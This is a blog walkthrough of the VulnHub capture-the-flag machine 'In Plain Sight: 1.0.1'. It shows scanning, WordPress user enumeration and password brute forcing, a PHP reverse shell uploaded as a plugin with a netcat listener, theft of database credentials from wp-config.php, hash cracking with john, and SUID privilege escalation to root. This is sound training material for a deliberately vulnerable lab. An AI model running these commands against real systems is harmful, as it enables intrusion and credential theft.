In Plain Sight: 1.0.1 walkthrough vulnhub

CTF | In Plain Sight: 1.0.1 vulnhub writeup

In this article, we are solving another Vulhub CTF In Plain Sight: 1 this Virtual machine is created by bzyo difficulty Level Beginner – Intermediate This machine is hosted on vulnhub server you can download here

Description

Built/Tested with VirtualBox. DHCP enabled. Need to get root to read flag

Network Scanning

First we perforce an arp-scan with netdiscover finding our target IP address.

netdiscover
In Plain Sight: 1.0.1 walkthrough vulnhub

In my case, my target id is 192.168.1.16 our next step is scanning our target open ports and running services using this command

nmap -A 192.168.1.16
In Plain Sight: 1.0.1 walkthrough vulnhub

We see the nmap output target ports 21 FTP, 22 SSH, and port 80 HTTP service is running

Enumeration

I Open our browser and paste the target IP address in URL and we see the apache2 ubuntu default page

http://192.168.1.16
In Plain Sight: 1.0.1 walkthrough vulnhub

we see a hint in the landing page You should replace the file ( locate at /var/www/html/index.htnl ) I open the URL new tab and we see an image file I click the image and the image is redirected this URL

http://192.168.1.16/index.htnl
/748AD6CCD32E4E52718445BB1CADC01EB08A0DF6
cat >urlhash

748AD6CCD32E4E52718445BB1CADC01EB08A0DF6

After enumeration the URL I upload php payload and we see a message File is not image

So I create a urlhash file and paste the URL hash this file using this command Bruteforce the file

john --wordlist=/usr/share/wordlists/rockyou.txt urlhash

Our hash is cracked and we see a message good luck I again upload a shell and we again see the massage I reading this page source code using inspect Element and I found a base64 comment

http://192.168.1.16/748AD6CCD32E4E52718445BB1CADC01EB08A0DF6/upload.php
In Plain Sight: 1.0.1 walkthrough vulnhub

I copy the base64 encoded text and using base64 -d decoding the value and found another WordPress URL

echo "c28tZGV2LXdvcmRwcmVzcw==" |base64 -d

Without wasting our time using wpscan WordPress scanner tool I find out all users the WordPress URL

wpscan --url http://192.168.1.16/so-dev-wordpress -e u

WordPress Password Brute Force

Using this command I brute-forcing the users we already found in our wpscan

wpscan --url http://192.168.1.16/so-dev-wordpress -U admin,mike -P /usr/share/wordlists/dirb/common.txt -t 100
In Plain Sight: 1.0.1 walkthrough vulnhub

After 40 seconds we found the user admin password I log in the WordPress and go to the plugins tab and here I upload a php reverse shell and I go to our next step ignoring plugins error.

http://inplainsight/so-dev-wordpress/wp-admin/plugin-install.php
In Plain Sight: 1.0.1 walkthrough vulnhub

and go to WordPress uploads directory I locate our reverse shell before calling our shell I already start our netcat listener

http://inplainsight/so-dev-wordpress/wp-content/uploads/2020/03/shell.php

I got a netcat reverse shell target machine but this is sh many commands is restricted this shell so I import /bin/bash using python3 spawn shell

nc -lvp 4545
python3 -c 'import pty;pty.spawn("/bin/bash")'
In Plain Sight: 1.0.1 walkthrough vulnhub

I got apache public directory here I found two WordPress account so I move on so-dev-WordPress directory

here we see wp-config.php file this file contains my sql username password plain text I copy the database username and password

cd /var/www/html/so-dev-wordpress
cat wp-config.php |more
In Plain Sight: 1.0.1 walkthrough vulnhub

I connected to the databases and describe the sodevwp_users table and I found the hash for mike.

mysql -u sodevwp -p
use sodevwp;

select * from sodevwp_users;
In Plain Sight: 1.0.1 walkthrough vulnhub

I copy the hash and save a hash name file Decoding the hash using john tool

john --wordlist=/usr/share/wordlist/rockyou.txt hash

Privilege Escalation

now since I found the password of mike user I change user www-data user to mike user

su mike
cat /etc/passwd |tail -n 3

ls -ls /etc/passwd

I found our another flag user joe password /etc/passwd- file

cat /etc/passwd- |tail -n 3
In Plain Sight: 1.0.1 walkthrough vulnhub

cat command to we see the user joe password

su joe

id

I checking SUID using the command find. find / -type f -perm -u=s 2>/dev/null

find / -type f -perm -u=s 2>/dev/null

I found there is an executable in /usr/bin called bwrap with SUID bits permission so I ran the command and I got a root shell

/usr/bin/bwrap
cd /root

ls

Reading our root flag using cat command

cat flag.txt
In Plain Sight: 1.0.1 walkthrough vulnhub
BossPlayer link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →